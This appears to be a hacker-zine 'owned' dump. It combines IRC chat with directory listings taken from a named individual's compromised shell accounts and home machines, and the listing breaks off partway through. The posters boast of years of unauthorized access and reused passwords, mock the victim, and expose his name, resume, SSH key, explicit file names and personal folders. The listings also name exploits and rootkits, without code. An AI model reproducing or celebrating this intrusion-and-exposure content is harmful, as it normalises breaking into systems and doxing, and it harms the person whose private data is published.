s0x -rw-r--r-- 1 jbowie jbowie 5419 s0x.tgz -rw-r--r-- 1 jbowie jbowie 65 safsite.out -rw-r--r-- 1 jbowie jbowie 42949 sexchart.8 -rw-r--r-- 1 jbowie jbowie 600 shellcode2.c -rw-r--r-- 1 jbowie jbowie 669 sparccmd.c -rwxr-xr-x 1 jbowie jbowie 120642 spook -rw------- 1 jbowie jbowie 1049 spook.c -rw-r--r-- 1 jbowie jbowie 365 test.c -rwxr-xr-x 1 jbowie jbowie 6007 w00crond I took a look at f00.c, that the lsd-pl ldt exploit isn't it? yes Did it work on slack.net openbsd 2.4? i almost got it working i think it keeps segfaulting so that is a good sign $ rm ~~~~~~~~~jjjjjjjjjjbooooooooooowwwwwwwiieeeeeeeeeeeeeeeeeeeeee *** Mode change "-o+b jdogg *!jbowie@slack.net" on channel #phrack by Swern hows it comin? > RMD > OWNED *** You have been kicked off channel #cdc by jnathan (Bitch-X BaBy!) man i can't believe it took u guys this long ive used the same password on every shell box for like 7 years took you long enough to catch on NOTE TO SELF, MAYBE WE ARE JUST TIRED OF OWNING YOU AND FELT LIKE RMING YOU. > EVERYONE HAS YOUR PASSWORD JOBE > WE'VE HAD YOUR BOXES FOR 7 YEARS didnt i already tell you that retard > JOBE > FACE IT > YOUR MYTHICAL HACKER MYSTIQUE > HAS BEEN DESTROYED > key_22_quantum.efni.com.pub > WE OWNED YOUR LAME SOLARIS FOR YEARS TOO what mythical hacker mystique? NOTE TO SELF, JOBE IS THE DARKSIDE. efni waz megaowned jdogg heh this is getting old :) who are you? funny, but old > SHUT THE FUCK UP JNATHAN wait what about apollo.gtei.net? NOTE TO SELF, EKIM IS A NARC. *kozubik* are you JD roberson ? > APOLLO.GTI.NET > GAIUS OWNED THAT *** kozubik has changed the topic on channel #cdc to Nice nice very nice. > AND TUNNELX IT lol hahaha the gre thing must be a different jdogg. 
i dont use netscape for my pron u missed one or 2 but thatz ok > WHICH ONE jdogg is last figure it out hacker genius > THE OTHERS NOT SOGOOD > DONT MAKE ME GO RM THOSE TOO > 0wned.org 1024 41 63897960634680087987473578821662473115676645146414098567729063962534050419025098865273166743308876730034769029776760707909878397798858888397059595356385321592348348338355240266795644650505202538605163304067738669371599283352177980986565362816775661015680930496199752053852827022342775527838857458044942037271 ok let us check out my home box now this is the grand finale Great scotts. $ ls -al total 230904 drwxr-xr-x 10 j staff 1536 . drwxr-xr-x 7 root root 512 .. -rw------- 1 420 staff 240 .Xauthority -rw-r--r-- 1 420 staff 124 .cshrc -rw-r--r-- 1 420 staff 581 .login -rw------- 1 root staff 100 .sh_history drwxr-xr-x 3 420 staff 512 .ssh2 drwxrwxrwx 86 420 staff 2048 7_Recommended -rw-r--r-- 1 420 staff 41787799 7_Recommended.zip -rwxr-xr-x 1 j staff 6996 Test -rw-r--r-- 1 j staff 77 Test.c -rwxr-xr-x 1 root other 70960 a -rw-r--r-- 1 root other 126 a.c -rwxr-xr-x 1 root other 7408 addr_wr_test -rw-r--r-- 1 root other 285 addr_wr_test.c -rwxr-xr-x 1 j staff 7192 b1nd -rw-r--r-- 1 j staff 141 b1nd.c -r-xr-xr-x 1 root other 6874624 bash-2.05-sol7-sparc-local -rwxr-xr-x 1 j staff 18436 bb -rw-r--r-- 1 j staff 11694 bb.c drwxr-xr-x 15 77 1002 1024 binutils-020210 -rw-r--r-- 1 root other 57057280 binutils.tar drwxr-xr-x 9 root root 512 cde -rw------- 1 root other 29616 core -rwxr-xr-x 1 j staff 3255348 dbx-sparc -r-xr-xr-x 1 root other 411648 gzip-1.2.4-sol7-intel-local -r-xr-xr-x 1 root other 291328 gzip-1.2.4a-sol7-intel-local -rw-r--r-- 1 root other 1489931 includes.tar.gz -rwxr-xr-x 1 420 staff 2326360 irc drwxr-xr-x 9 420 staff 1024 ircii-2.9 -rw-r--r-- 1 420 staff 2508800 ircii-2.9-roof.tar -r-xr-xr-x 1 j staff 29512 login drwxr-xr-x 2 j staff 512 logintest -r--r--r-- 1 j staff 5361 pam_impl.h -rw-r--r-- 1 420 staff 161242 pf.irc drwxr-xr-x 2 j staff 512 plttest -rw-r--r-- 1 j 
staff 2237 rquota.h -rw-r--r-- 1 j staff 1526 rquota.x -rw-r--r-- 1 j staff 1094 rquota_clnt.c -rw-r--r-- 1 j staff 4703 rquota_svc.c -rw-r--r-- 1 j staff 5368 rquota_xdr.c -rwxr-xr-x 1 root other 6992 sizint -rw-r--r-- 1 root other 84 sizint.c -rwxr-xr-x 1 root other 15680 sl -rw-r--r-- 1 j staff 7051 sol.tar.gz -rw-r--r-- 1 j staff 1489778 sol7-includes.tar.gz -rw-r--r-- 1 j staff 11817 sparc_login.c drwxr-xr-x 14 root root 512 src -rwxr-xr-x 1 j staff 9504 test -rw-r--r-- 1 j staff 153 test.c -rwxr-xr-x 1 j staff 7052 tmp -rw-r--r-- 1 j staff 128 tmp.c -rw-r--r-- 1 root other 9847 truss -rwxr-xr-x 1 j staff 10344 uf -rw-r--r-- 1 j staff 2441 uf.c -rwxr-xr-x 1 j staff 9684 uf2 -rwxr-xr-x 1 420 staff 8280 w -rw-r--r-- 1 420 staff 1520 w00.c -rwxr-xr-x 1 j staff 9956 w00f -rw-r--r-- 1 j staff 2433 w00f.c -rw-r--r-- 1 root other 141 w00t.c -rwxr-xr-x 1 j staff 9084 z2 -rw-r--r-- 1 j staff 2006 z2.c -rwxr-xr-x 1 j staff 14252 z3 -rw-r--r-- 1 j staff 7812 z3.c $ ls -al ~jduck drwxr-xr-x 2 jduck staff 512 . drwxr-xr-x 7 root root 512 .. -rw------- 1 jduck staff 1646 .bash_history -rw-r--r-- 1 jduck staff 121 .bashrc -rw-r--r-- 1 jduck staff 124 .cshrc -rw-r--r-- 1 jduck staff 581 .login -rw-r--r-- 1 root root 368 Makefile -rw-r--r-- 1 root root 1423 README -rwsr-xr-- 1 root suid 7192 b1nd -rw------- 1 root other 218608 core -rw-r--r-- 1 root other 0 kkk -rw-r--r-- 1 root other 1200 memmove.o -rwxr-xr-x 1 jduck staff 15576 sl -rwxr-xr-x 1 root other 15608 sparc_login -rw-r--r-- 1 jduck staff 8662 sparc_login.c -rw-r--r-- 1 root other 98324 strmod -rwxr-xr-x 1 35303 root 5442 strmod.c -rw-r--r-- 1 root other 96352 strmod.o -rw-r--r-- 1 jduck staff 10240 strmod.tar -rw-r--r-- 1 root other 1164 strstr.o $ ls -al ~palmers total 106 drwxr-xr-x 3 palmers staff 512 . drwxr-xr-x 7 root root 512 .. 
-rw-rw-rw- 1 root staff 46 .bashrc -rw-rw-rw- 1 root staff 46 .profile -rwsr-xr-- 1 root suid 7192 b1nd -rw-r--r-- 1 palmers staff 40960 soa.tar drwxrwxrwx 2 30 root 512 soladore-0.00 More, more! $ ls -al /windows total 6566658 -rwxr-xr-x 1 root wheel 4 $DRVLTR$.~_~ -r-xr-xr-x 1 root wheel 228240 $LDR$ drwxr-xr-x 1 root wheel 32768 $WIN_NT$.~BT -rwxr-xr-x 1 root wheel 4700204 (Bill Clinton) - Al Gore Paradise.wav drwxr-xr-x 1 root wheel 32768 . drwxr-xr-x 22 root wheel 512 .. -rwxr-xr-x 1 root wheel 18948140 0151 - Bill Clinton - Sex Is Dandy (Marcy Playground - Sex & Candy).wav -rwxr-xr-x 1 root wheel 29439 101500.cgi -rwxr-xr-x 1 root wheel 565 101500.zip drwxr-xr-x 1 root wheel 32768 3dsmaxtemp -rwxr-xr-x 1 root wheel 667222016 4.4-install.iso -r-xr-xr-x 1 root wheel 566 ASD.LOG drwxr-xr-x 1 root wheel 32768 ATI -rwxr-xr-x 1 root wheel 271 AUTOEXEC.BAK -rwxr-xr-x 1 root wheel 254 AUTOEXEC.BAT -rwxr-xr-x 1 root wheel 392 AspiLog.TXT drwxr-xr-x 1 root wheel 32768 BDE -r-xr-xr-x 1 root wheel 178 BOOT.INI -rwxr-xr-x 1 root wheel 46822 BOOTLOG.PRV -rwxr-xr-x 1 root wheel 56966 BOOTLOG.TXT -r-xr-xr-x 1 root wheel 512 BOOTSECT.DOS -rwxr-xr-x 1 root wheel 15611948 Bill_Clinton-Gettin_sticky_wit_it.wav -rwxr-xr-x 1 root wheel 51300908 Billy Joel - We Didn't Start the Fire.wav -rwxr-xr-x 1 root wheel 11776 Bowie_Jonathan.doc -r-xr-xr-x 1 root wheel 241696 CLASSES.1ST -rwxr-xr-x 1 root wheel 93040 COMMAND.COM -rwxr-xr-x 1 root wheel 0 CONFIG.BAK -rwxr-xr-x 1 root wheel 0 CONFIG.SYS drwxr-xr-x 1 root wheel 32768 Casey's Punk -rwxr-xr-x 1 root wheel 12156 CaseyXmasXXX.cmp drwxr-xr-x 1 root wheel 32768 Casino -rwxr-xr-x 1 root wheel 46404 DETLOG.TXT -rwxr-xr-x 1 root wheel 40527404 DJ Diggity - Nelly & Others - (Hot Shit) Country Grammar [Remix].wav -rwxr-xr-x 1 root wheel 20381228 Isaac - Face Down, Ass Up, That's the way we like to fuck.wav -rwxr-xr-x 1 root wheel 3951 Dreamisoz.fr.st-hlg-hunt.bob -rwxr-xr-x 1 root wheel 32768 Excitebike 64 (U) [!].mpk -rwxr-xr-x 1 root 
wheel 16777216 Excitebike 64 (U) [!].rom -rwxr-xr-x 1 root wheel 6445060 Expert Blowjob01 (19 Sec) - Amazing! Deepthroat Blowjob Sex Young Hidden Voyeur Amateur.mpg drwxr-xr-x 1 root wheel 32768 FFX Videos drwxr-xr-x 1 root wheel 32768 FLWBass Demo drwxr-xr-x 1 root wheel 32768 Folder Settings drwxr-xr-x 1 root wheel 32768 Games drwxr-xr-x 1 root wheel 32768 Hack drwxr-xr-x 1 root wheel 32768 INSTALL -r-xr-xr-x 1 root wheel 110080 IO.SYS -rwxr-xr-x 1 root wheel 608 IPH.PH -rwxr-xr-x 1 root wheel 46058037 ISS.System.Security.Scanner.v4.WinNT2K.DOD.tar.gz drwxr-xr-x 1 root wheel 32768 ISSv4 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R00 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R01 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R02 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R03 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R04 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R05 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R06 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R07 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R08 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R09 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R10 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R11 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R12 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R13 -rwxr-xr-x 1 root wheel 2809651 ISSv4.R14 -rwxr-xr-x 1 root wheel 2880000 ISSv4.RAR -rwxr-xr-x 1 root wheel 2177360 InstallShockmachine.EXE -rwxr-xr-x 1 root wheel 11264 Jonathan_Bowie_Resume.doc -rwxr-xr-x 1 root wheel 4 MSDOS.--- -r-xr-xr-x 1 root wheel 1664 MSDOS.SYS drwxr-xr-x 1 root wheel 32768 MSVS98 -rwxr-xr-x 1 root wheel 679673856 Mandrake81-cd1-inst.i586.iso drwxr-xr-x 1 root wheel 32768 Music drwxr-xr-x 1 root wheel 32768 My Documents drwxr-xr-x 1 root wheel 32768 My Music -rwxr-xr-x 1 root wheel 32768 NBA Jam 2000 (U) [!].mpk -rwxr-xr-x 1 root wheel 16777216 NBA Jam 2000 (U) [!].v64 drwxr-xr-x 1 root wheel 32768 NCDTREE -rwxr-xr-x 1 root wheel 16211 NETLOG.TXT -rwxr-xr-x 1 root wheel 45992492 Nas & Puff Daddy - Hate Me Now.wav drwxr-xr-x 1 root wheel 32768 NovaLogic -rwxr-xr-x 1 root wheel 
358842368 OpenBSD30-i386-base-ipf.iso -rwxr-xr-x 1 root wheel 2527 PCcheck.LOG drwxr-xr-x 1 root wheel 32768 PSA Stuff drwxr-xr-x 1 root wheel 32768 Program Files -rwxr-xr-x 1 root wheel 1448 README.TXT -rwxr-xr-x 1 root wheel 86016 REGMON.EXE -rwxr-xr-x 1 root wheel 13232 REGMON.HLP -rwxr-xr-x 1 root wheel 22576 REGSYS.SYS -rwxr-xr-x 1 root wheel 23143 REGVXD.VXD drwxr-xr-x 1 root wheel 32768 Recycled -rwxr-xr-x 1 root wheel 445 SCANDISK.LOG -rwxr-xr-x 1 root wheel 189869 SETUPLOG.TXT -rwxr-xr-x 1 root wheel 6889472 SSHWinClient-3.1.0-build235.exe -rwxr-xr-x 1 root wheel 5166 SUHDLOG.DAT -rwxr-xr-x 1 root wheel 544800 SYSTEM.1ST drwxr-xr-x 1 root wheel 32768 Shit Talker v1.2 drwxr-xr-x 1 root wheel 32768 Sketcher drwxr-xr-x 1 root wheel 32768 SoftIce drwxr-xr-x 1 root wheel 32768 Sonja Songs drwxr-xr-x 1 root wheel 32768 Temp -rwxr-xr-x 1 root wheel 261876069 TheSims.rar -rwxr-xr-x 1 root wheel 4159692 Traci - Deep_Inside_Traci _Lords.mov -rwxr-xr-x 1 root wheel 10986500 Tracy n Ron.mpg -rwxr-xr-x 1 root wheel 1667960 Untitled-1.psd -rwxr-xr-x 1 root wheel 1167628 Untitled-2.psd -rwxr-xr-x 1 root wheel 49152 VIDEOROM.BIN drwxr-xr-x 1 root wheel 32768 Valerie2 drwxr-xr-x 1 root wheel 32768 WAVs drwxr-xr-x 1 root wheel 32768 WINDOWS drwxr-xr-x 1 root wheel 32768 WINWORD -rwxr-xr-x 1 root wheel 62 WS_FTP.LOG drwxr-xr-x 1 root wheel 32768 Winzip drwxr-xr-x 1 root wheel 32768 _RESTORE drwxr-xr-x 1 root wheel 32768 acadtemp drwxr-xr-x 1 root wheel 32768 acidwarp -rwxr-xr-x 1 root wheel 669935 anarchy.txt -rwxr-xr-x 1 root wheel 931004 anarchyv5.zip -rwxr-xr-x 1 root wheel 731617 audc20.exe -rwxr-xr-x 1 root wheel 224 autoexec.nav -rwxr-xr-x 1 root wheel 1120 baseclasses.log -rwxr-xr-x 1 root wheel 647181 bee.txt drwxr-xr-x 1 root wheel 32768 bill -rwxr-xr-x 1 root wheel 403916 bing-j.jpg -rwxr-xr-x 1 root wheel 488217 bing1-j.jpg -rwxr-xr-x 1 root wheel 1459 blah -rwxr-xr-x 1 root wheel 177298 bombs.zip drwxr-xr-x 1 root wheel 32768 cable modems - breaks the lancity 
modem cap -rwxr-xr-x 1 root wheel 2378 cart.html drwxr-xr-x 1 root wheel 32768 caseyxmas -rwxr-xr-x 1 root wheel 9771787 cdjd.exe -rwxr-xr-x 1 root wheel 402789 cj_7979.wmv drwxr-xr-x 1 root wheel 32768 contrib -rwxr-xr-x 1 root wheel 644608 cookbook97.doc -rwxr-xr-x 1 root wheel 97458 corn029[1].zip drwxr-xr-x 1 root wheel 32768 cripto -rwxr-xr-x 1 root wheel 159258 csircd-1.13.tar.gz -rwxr-xr-x 1 root wheel 127502 curt-mosiac.jpg -rwxr-xr-x 1 root wheel 1629844 curt-mosiac.psd drwxr-xr-x 1 root wheel 32768 cygwin -rwxr-xr-x 1 root wheel 163437 data1024.dbb -rwxr-xr-x 1 root wheel 173396 data256.dbb -rwxr-xr-x 1 root wheel 9303 data4096.dbb drwxr-xr-x 1 root wheel 32768 dc-ufc drwxr-xr-x 1 root wheel 32768 dcstuff drwxr-xr-x 1 root wheel 32768 decoded drwxr-xr-x 1 root wheel 32768 deusex -rwxr-xr-x 1 root wheel 8769 dod.nfo -rwxr-xr-x 1 root wheel 34179 download.cgi -rwxr-xr-x 1 root wheel 20000000 e-cp2k.001 -rwxr-xr-x 1 root wheel 337 e-cp2k.sfv -rwxr-xr-x 1 root wheel 20000000 e-gta2dc.001 -rwxr-xr-x 1 root wheel 20000000 e-hoylec.001 -rwxr-xr-x 1 root wheel 18456576 e-sf3rds.001 -rwxr-xr-x 1 root wheel 18268 e_nav2001be.zip -rwxr-xr-x 1 root wheel 468087 ec2t2.exe -rwxr-xr-x 1 root wheel 1248 envja6hw.sys -rwxr-xr-x 1 root wheel 1248 envjawt3.sys -rwxr-xr-x 1 root wheel 414 file_id.diz -rwxr-xr-x 1 root wheel 632485888 flwpro.iso drwxr-xr-x 1 root wheel 32768 ftproot -rwxr-xr-x 1 root wheel 2407 g_lps_ies[1].zip -rwxr-xr-x 1 root wheel 11070 gr_Budswell Stoner.current -rwxr-xr-x 1 root wheel 7135 gr_Budswell Stoner.previous drwxr-xr-x 1 root wheel 32768 hacker -rwxr-xr-x 1 root wheel 267526 hamilton.bmp -rwxr-xr-x 1 root wheel 74416 hamilton.psf -rwxr-xr-x 1 root wheel 840 hydro.txt drwxr-xr-x 1 root wheel 32768 ida drwxr-xr-x 1 root wheel 32768 ios -rwxr-xr-x 1 root wheel 1871 ip.txt -rwxr-xr-x 1 root wheel 394069 j.jpg -rwxr-xr-x 1 root wheel 20000000 kal-ths2.001 -rwxr-xr-x 1 root wheel 24576 kill_cih.exe drwxr-xr-x 1 root wheel 32768 latest -rwxr-xr-x 1 
root wheel 12555 lp-shop.html drwxr-xr-x 1 root wheel 32768 mIRC drwxr-xr-x 1 root wheel 32768 mame -rwxr-xr-x 1 root wheel 20875 marb.jpg drwxr-xr-x 1 root wheel 32768 master_of_orion_2 -rwxr-xr-x 1 root wheel 7737584 mjb51149enu.exe drwxr-xr-x 1 root wheel 32768 mp3z -rwxr-xr-x 1 root wheel 98 mp_.current -rwxr-xr-x 1 root wheel 90 mp_.previous -rwxr-xr-x 1 root wheel 10 mp_Budswell Stoner.current -rwxr-xr-x 1 root wheel 50 mp_Budswell Stoner.previous -rwxr-xr-x 1 root wheel 17488 msiexec.ex_ drwxr-xr-x 1 root wheel 32768 msme drwxr-xr-x 1 root wheel 32768 na2002 -rwxr-xr-x 1 root wheel 0 nav80try.exe -rwxr-xr-x 1 root wheel 4869253 netzero.exe -rwxr-xr-x 1 root wheel 10001569 nortonpersonalfirewall2001_2.5_en-us.rar -r-xr-xr-x 1 root wheel 34420 ntdetect.com -rwxr-xr-x 1 root wheel 13196572 nticdmaker508full[1].zip -r-xr-xr-x 1 root wheel 213904 ntldr drwxr-xr-x 1 root wheel 32768 officeinst drwxr-xr-x 1 root wheel 32768 opennap -rwxr-xr-x 1 root wheel 598 os581474.bin drwxr-xr-x 1 root wheel 32768 ps.tmp -rwxr-xr-x 1 root wheel 147456 pscp-x86.exe -rwxr-xr-x 1 root wheel 8076 rcdet.txt -rwxr-xr-x 1 root wheel 174460928 rq_ext1.mpg drwxr-xr-x 1 root wheel 32768 sb3 -rwxr-xr-x 1 root wheel 32059 self-igniting.txt drwxr-xr-x 1 root wheel 32768 shockwave4kc -rwxr-xr-x 1 root wheel 703368 shockwaveinstaller.exe -rwxr-xr-x 1 root wheel 258668 shoutcast-1-8-3-windows.exe drwxr-xr-x 1 root wheel 32768 snort-1.7-win32-static drwxr-xr-x 1 root wheel 32768 sol7-pkgs drwxr-xr-x 1 root wheel 32768 sony drwxr-xr-x 1 root wheel 32768 source drwxr-xr-x 1 root wheel 32768 sta drwxr-xr-x 1 root wheel 32768 stuf drwxr-xr-x 1 root wheel 32768 tp2002 -r-xr-xr-x 1 root wheel 379906 txtsetup.sif drwxr-xr-x 1 root wheel 32768 untitled drwxr-xr-x 1 root wheel 32768 vctut drwxr-xr-x 1 root wheel 32768 wftpd -rwxr-xr-x 1 root wheel 2412 whatsnew.txt -rwxr-xr-x 1 root wheel 3644834 winamp2666_u2.exe drwxr-xr-x 1 root wheel 32768 xinstall drwxr-xr-x 1 root wheel 32768 zoo drwxr-xr-x 1 root 
wheel 32768 zsnesw We didn't start the fire is a GAY song. should i show my special porn dir? let me grep out a few things in the ls $ ls -al porn DUE TO THE DISGUSTING NATURE OF THIS LS, WE HAVE FORBID OURSELVES TO SHOW IT. Disgusting.. You are sick. :D:D:D:D:D:D:D Chunks of caviar, on the floor, and on my leg. $ w USER TTY FROM LOGIN@ IDLE WHAT root v0 - Wed04PM 2days xinit /root/.xinitrc - root p0 :0.0 Wed04PM 6:49 csh root p1 :0.0 Wed04PM 5:11 ssh -C -l jobe -c 3des root p2 :0.0 Wed06PM 7:58 vi sparc-solaris root p3 :0.0 Wed06PM 4:06 ssh -C -l jobe -c 3des root p4 :0.0 Thu05AM 1day vi test_sol_login.c root p5 :0.0 Thu05AM 4:06 bash root p6 :0.0 Thu01PM 4:12 csh root p7 :0.0 Thu02PM 1day csh root p8 :0.0 Fri11AM 4:06 csh r0b1n v1 - Fri11AM - w $ ls -al /root drwxr-xr-x 33 root wheel 4096 . drwxr-xr-x 22 root wheel 512 .. -rw------- 1 root wheel 191 .Xauthority -rw------- 1 root wheel 625 .althearc -rw------- 1 root wheel 63035 .bash_history -rw-r--r-- 2 root wheel 802 .cshrc drwxr-xr-t 2 root wheel 512 .esd drwxr-xr-x 2 root wheel 512 .ethereal drwxr-xr-x 4 root wheel 512 .gnapster -rw------- 1 root wheel 3013 .history -rw-r--r-- 1 root wheel 142 .klogin drwx------ 2 root wheel 512 .kza -rw-r--r-- 1 root wheel 297 .login drwxr-xr-x 3 root wheel 512 .mozilla drwx------ 4 root wheel 512 .netscape -rw------- 1 root wheel 44 .poppyrc -rw-r--r-- 2 root wheel 251 .profile drwx------ 2 root wheel 512 .ssh drwxr-xr-x 2 root wheel 512 .ssh2 -rw-r--r-- 1 root wheel 5101 .suids lrwxr-xr-x 1 root wheel 12 .wine -> /stuff/.wine -rw-r--r-- 1 root wheel 464 .wmpop3rc drwxr-xr-x 2 root wheel 512 .xine -rwxr-xr-x 1 root wheel 108 .xinitrc drwxr-xr-x 4 root wheel 512 .xmms -rwxr-xr-x 1 root wheel 108 .xsession drwxr-xr-x 2 root wheel 512 7350cfingerd -rw-r--r-- 1 root wheel 19713 7350cfingerd-0.0.4.tar.gz -rw-r--r-- 1 root wheel 414316 CURRENT.tar.gz -rw-r--r-- 1 root wheel 3840 Changelog -rw-r--r-- 1 root wheel 4781 Collector-1.0.tar.gz -rw-r--r-- 1 root wheel 90 FILE_ID.DIZ 
drwxr-xr-x 5 root wheel 512 GNUstep -rw-r--r-- 1 root wheel 7655 Hunter-1.2.tar.gz -rw-r--r-- 1 root wheel 7011 ICMP-Tunnel_P4-1.0.tar.gz drwx------ 2 root wheel 512 Mail -rw-r--r-- 1 root wheel 3805 Makefile -rw-r--r-- 1 root wheel 2252 README -rw-r--r-- 1 root wheel 6246 Searcher-8.0.tar.gz -rw-r--r-- 1 root wheel 16744 Smeagol-4.4.4.tar.gz drwxr-xr-x 3 root wheel 1024 StMichael_LKM-0.08 -rw-r--r-- 1 root wheel 30545 StMichael_LKM-0.08.tar.gz -rw-r--r-- 1 root wheel 903514 V8.pdf -rw------- 1 root wheel 864256 XF86_SVGA.core -rwxr-xr-x 1 root wheel 6415 abo10 -rw-r--r-- 1 root wheel 224 abo10.c -rwxr-xr-x 1 root wheel 50589 abo2 -rw-r--r-- 1 root wheel 381 abo2.c -rwxr-xr-x 1 root wheel 4461 abo2.new -rwxr-xr-x 1 root wheel 4606 abo3 -rw-r--r-- 1 root wheel 433 abo3.c -rwxr-xr-x 1 root wheel 4546 abo3.new -rwxr-xr-x 1 root wheel 4843 abo4 -rw-r--r-- 1 root wheel 495 abo4.c -rwxr-xr-x 1 root wheel 6228 abo5 -rw-r--r-- 1 root wheel 632 abo5.c -rw------- 1 root wheel 294912 abo5.core -rwxr-xr-x 1 root wheel 15470 abo6 -rw-r--r-- 1 root wheel 371 abo6.c -rw------- 1 root wheel 8329 abo6.ktrace -rwxr-xr-x 1 root wheel 4580 abo6.new -rwxr-xr-x 1 root wheel 6134 abo7 -rw-r--r-- 1 root wheel 90 abo7.c -rwxr-xr-x 1 root wheel 8404 abo8 -rw-r--r-- 1 root wheel 252 abo8.c -rwxr-xr-x 1 root wheel 6176 abo9 -rw-r--r-- 1 root wheel 191 abo9.c drwxr-xr-x 3 root wheel 512 adore -rw-r--r-- 1 root wheel 14749 adore-0.42.tgz -rw-r--r-- 1 root wheel 46403 b00s -rw-r--r-- 1 root wheel 0 blah -rw-r--r-- 1 root wheel 258 bll -rw-r--r-- 1 root wheel 6401 boink.c -rw-r--r-- 1 root wheel 445006 bz.hosts -rwxr-xr-x 1 root wheel 4235 call -rw-r--r-- 1 root wheel 32 call.c -rw-r--r-- 1 root wheel 3339 clear-1.3.tar.gz -rwxr-xr-x 1 root wheel 12239 cmsd -rw-r--r-- 1 root wheel 1872 cnt-svr-filetransfer.tar.gz -rw-r--r-- 1 root wheel 1438 daemonshell.tar.gz drwxr-xr-x 2 root wheel 512 data -rw-r--r-- 1 root wheel 273 done.up -rw-r--r-- 1 root wheel 635195 edu -rwxr-xr-x 1 root wheel 6018 er 
-rw-r--r-- 1 root wheel 2845 errors -rwxr-xr-x 1 root wheel 11146 ex_abo2 -rw-r--r-- 1 root wheel 1044 ex_abo2.c -rwxr-xr-x 1 root wheel 4925 ex_abo3 -rw-r--r-- 1 root wheel 768 ex_abo3.c -rwxr-xr-x 1 root wheel 4957 ex_abo4 -rw-r--r-- 1 root wheel 844 ex_abo4.c -rwxr-xr-x 1 root wheel 10856 ex_abo5 -rw-r--r-- 1 root wheel 1272 ex_abo5.c -rw------- 1 root wheel 21092 ex_abo5.out -rwxr-xr-x 1 root wheel 4888 ex_abo6 -rw-r--r-- 1 root wheel 1268 ex_abo6.c -rw------- 1 root wheel 16005 ex_abo6.out -rwxr-xr-x 1 root wheel 4844 ex_abo7 -rw-r--r-- 1 root wheel 1183 ex_abo7.c -rw------- 1 root wheel 15698 ex_abo7.out -rwxr-xr-x 1 root wheel 5175 ex_abo8 -rw-r--r-- 1 root wheel 1358 ex_abo8.c -rw------- 1 root wheel 8023 ex_abo8.out -rwxr-xr-x 1 root wheel 4536 ex_fsx6 -rw-r--r-- 1 root wheel 181 ex_fsx6.c -rw-r--r-- 1 root wheel 1390 exec_race.c -rw-r--r-- 1 root wheel 5475 fawx.c drwxr-xr-x 2 root wheel 512 fhffp -rw-r--r-- 1 root wheel 0 file -rw-r--r-- 1 root wheel 2937 fingerd-fileserver.tar.gz -rwxr-xr-x 1 root wheel 4685 forktest -rw-r--r-- 1 root wheel 239 forktest.c -rwxr-xr-x 1 root wheel 6083 fstring -rw-r--r-- 1 root wheel 91 fstring.c -rwxr-xr-x 1 root wheel 7999 fsx6 -rw-r--r-- 1 root wheel 413 fsx6.c -rwxr-xr-x 1 root wheel 6134 gabo7 -rw-r--r-- 1 root wheel 1790 gdb.txt -rw-r--r-- 1 root wheel 11629 generic.h -rw-r--r-- 1 root wheel 8501 ici.out -rw-r--r-- 1 root wheel 11852 in.telnetd drwxr-xr-x 2 root wheel 512 iob -rw-r--r-- 1 root wheel 5899 iob-0.1.tar.gz -rwxr-xr-x 1 root wheel 6499 killwin -rw-r--r-- 1 root wheel 1771 killwin.c -rw-r--r-- 1 root wheel 29 kr.hosts -rw------- 1 root wheel 72 ktrace.out drwxr-xr-x 2 root wheel 512 kza-0.401 drwx------ 2 root wheel 512 kza-downloads -rw-r--r-- 1 root wheel 294517 kza.linux.tar.gz -rwxr-xr-x 1 root wheel 9911 loginex -rw-r--r-- 1 root wheel 7650 loginex.c drwxr-xr-x 2 root wheel 512 mtv -rw-r--r-- 1 root wheel 258322 mtv-1.0.8.0.tar.gz -rw-r--r-- 1 root wheel 75267 nc110.tgz -rw-r--r-- 1 root wheel 2645 
netcat.blurb -rw-r--r-- 1 root wheel 58553 netcat.c drwx------ 7 root wheel 512 ninja-1.5.7 -rw-r--r-- 1 root wheel 693696 ninja-1.5.7.tar.gz -rw-r--r-- 1 root wheel 693696 ninja-src.tar.gz drwxr-xr-x 6 root wheel 6656 openssh-3.0.2p1 -rw-r--r-- 1 root wheel 781092 openssh-3.0.2p1.tar.gz -rwxr-xr-x 1 root wheel 4671 passprog -rw-r--r-- 1 root wheel 479 passprog.c -rwxr-xr-x 1 root wheel 6270 passtest -rw-r--r-- 1 root wheel 2004 passtest.c -rw------- 1 root wheel 11650 passtest.out -rw-r--r-- 1 root wheel 1684 paz-1.0.tar.gz -rwxr-xr-x 1 root wheel 9477 pepsi -rw-r--r-- 1 root wheel 7215 pepsi.c -rwxr-xr-x 1 root wheel 6267 pinger -rw-r--r-- 1 root wheel 3013 pinger.c -rw-r--r-- 1 root wheel 2770 probe-2.3.tar.gz -rw-r--r-- 1 root wheel 54184 qcrack-1.02.tar.gz -rw-r--r-- 1 root wheel 121423 roseposter.jpg -rwxr-xr-x 1 root wheel 5116 sc -rw-r--r-- 1 root wheel 327 sc.c drwxr-xr-x 2 root wheel 512 screamingCobra-1.04 drwxr-xr-x 2 root wheel 512 scripts -rwxr-xr-x 1 root wheel 4352 sizint -rw-r--r-- 1 root wheel 101 sizint.c -rw-r--r-- 1 root wheel 378 sol-ffcore.sh -rw-r--r-- 1 root wheel 12091 solsparc_rpc.cmsd.c -rwxr-xr-x 1 root wheel 9832 sparc_login -rw-r--r-- 1 root wheel 8598 sparc_login.c -rw------- 1 root wheel 299008 sparc_login.core -rwxr-xr-x 1 root wheel 24444 sparc_login2 -rw------- 1 root wheel 299008 sparc_login2.core drwxr-xr-x 4 root wheel 3072 ssh-1.2.32 -rw-r--r-- 1 root wheel 1030240 ssh-1.2.32.tar.gz drwxr-xr-x 5 root wheel 1024 ssh-2.4.0 -rw-r--r-- 1 root wheel 1911375 ssh-2.4.0.tar.gz -rw-r--r-- 1 root wheel 14368 statdx2.c -rw-r--r-- 1 root wheel 5856 statdx2.tar.gz -rwxr-xr-x 1 root wheel 8549 stupidh -rwxr-xr-x 1 root wheel 7797 syndrop -rw-r--r-- 1 